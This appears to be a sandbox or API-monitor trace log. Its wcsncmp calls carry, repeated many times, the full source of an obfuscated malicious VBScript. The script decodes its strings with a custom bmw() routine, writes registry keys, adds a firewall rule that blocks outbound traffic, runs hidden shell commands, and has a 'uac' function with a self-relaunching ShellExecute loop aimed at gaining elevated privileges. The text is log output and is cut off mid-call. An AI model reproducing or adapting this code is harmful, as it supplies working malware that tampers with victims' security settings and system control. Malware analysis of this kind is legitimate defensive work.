bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0223.010] wcsncmp (_String1="ext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.011] wcsncmp (_String1="xt\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0223.011] wcsncmp (_String1="t\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.011] wcsncmp (_String1="\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0223.011] wcsncmp (_String1="\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd 